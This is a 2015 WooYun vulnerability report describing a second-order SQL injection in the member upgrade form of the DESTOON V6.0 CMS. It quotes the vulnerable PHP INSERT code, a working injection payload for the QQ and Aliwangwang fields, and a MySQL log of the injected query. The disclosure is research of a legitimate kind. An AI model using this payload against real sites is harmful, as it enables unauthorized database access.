当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(40) 关注此漏洞

缺陷编号: WooYun-2015-162861

漏洞标题: DESTOON V6.0 (2015-11-25)某处SQL注入

相关厂商: DESTOON

漏洞作者: Xser

提交时间: 2015-12-21 11:58

公开时间: 2016-01-28 17:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

6人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-02-14: 细节向核心白帽子及相关领域专家公开
2016-02-24: 细节向普通白帽子公开
2016-03-05: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

二次注入

详细说明:

因为dhtmlspecialchars这个函数把实体后的"置空了

所以提交"被转义\"然后置空就剩下\了

所以导致注入





在/destoon/module/member/grade.inc.php中



code 区域
$company = dhtmlspecialchars(trim($company));
$truename = dhtmlspecialchars(trim($truename));
$telephone = dhtmlspecialchars(trim($telephone));
$mobile = dhtmlspecialchars(trim($mobile));
$email = dhtmlspecialchars(trim($email));
$msn = dhtmlspecialchars(trim($msn));
$qq = dhtmlspecialchars(trim($qq));
$ali = dhtmlspecialchars(trim($ali));
$skype = dhtmlspecialchars(trim($skype));
$content = dhtmlspecialchars(trim($content));
$db->query("INSERT INTO {$DT_PRE}upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('$_userid','$_username', '$groupid','$company','$truename','$telephone','$mobile','$email','$msn','$qq','$ali','$skype','$content', '$DT_TIME', '$DT_IP','$amount','$promo_code','$promo_type','$promo_amount','2')");
message($L['grade_msg_success'], DT_PATH, 5);





可以注入了



code 区域
访问**.**.**.**/destoon/member/grade.php
升级企业会员
然后资料写
QQ:"
阿里旺旺:,(version()),00,0000,1450548173,0,0,0,0,0,2)#





我们来看看Mysql的监控

QQ截图20151220022633.png





code 区域
2015/12/20 2:20	INSERT INTO destoon_upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('2','test', '6','aaaaa','aaaaa','111111111','','11111@qq.cpom','','\',',(version()),00,0000,1450548173,0,0,0,0,0,2)#','','', '1450549202', '**.**.**.**','0','','0','0','2')





语句被带入



等管理员通过审核就可以看到结果了

QQ截图20151220022731.png

漏洞证明:

因为dhtmlspecialchars这个函数把实体后的"置空了

所以提交"被转义\"然后置空就剩下\了

所以导致注入





在/destoon/module/member/grade.inc.php中



code 区域
$company = dhtmlspecialchars(trim($company));
$truename = dhtmlspecialchars(trim($truename));
$telephone = dhtmlspecialchars(trim($telephone));
$mobile = dhtmlspecialchars(trim($mobile));
$email = dhtmlspecialchars(trim($email));
$msn = dhtmlspecialchars(trim($msn));
$qq = dhtmlspecialchars(trim($qq));
$ali = dhtmlspecialchars(trim($ali));
$skype = dhtmlspecialchars(trim($skype));
$content = dhtmlspecialchars(trim($content));
$db->query("INSERT INTO {$DT_PRE}upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('$_userid','$_username', '$groupid','$company','$truename','$telephone','$mobile','$email','$msn','$qq','$ali','$skype','$content', '$DT_TIME', '$DT_IP','$amount','$promo_code','$promo_type','$promo_amount','2')");
message($L['grade_msg_success'], DT_PATH, 5);





可以注入了



code 区域
访问**.**.**.**/destoon/member/grade.php
升级企业会员
然后资料写
QQ:"
阿里旺旺:,(version()),00,0000,1450548173,0,0,0,0,0,2)#





我们来看看Mysql的监控

QQ截图20151220022633.png





code 区域
2015/12/20 2:20	INSERT INTO destoon_upgrade (userid,username,groupid,company,truename,telephone,mobile,email,msn,qq,ali,skype,content,addtime,ip,amount,promo_code,promo_type,promo_amount,status) VALUES ('2','test', '6','aaaaa','aaaaa','111111111','','11111@qq.cpom','','\',',(version()),00,0000,1450548173,0,0,0,0,0,2)#','','', '1450549202', '**.**.**.**','0','','0','0','2')





语句被带入



等管理员通过审核就可以看到结果了

QQ截图20151220022731.png

修复方案:

版权声明:转载请注明来源 Xser@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-21 16:03

厂商回复:

感谢反馈 我们会尽快修复

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-12-29 00:11 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    这是多少奖金啊

  2. 2015-12-29 07:19 | Xser ( 普通白帽子 | Rank:379 漏洞数:86 | JDSec)
    0

    @U神 2k而已

  3. 2015-12-29 14:43 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @Xser 这特么是我一个月的工钱啊

登录后才能发表评论,请先 登录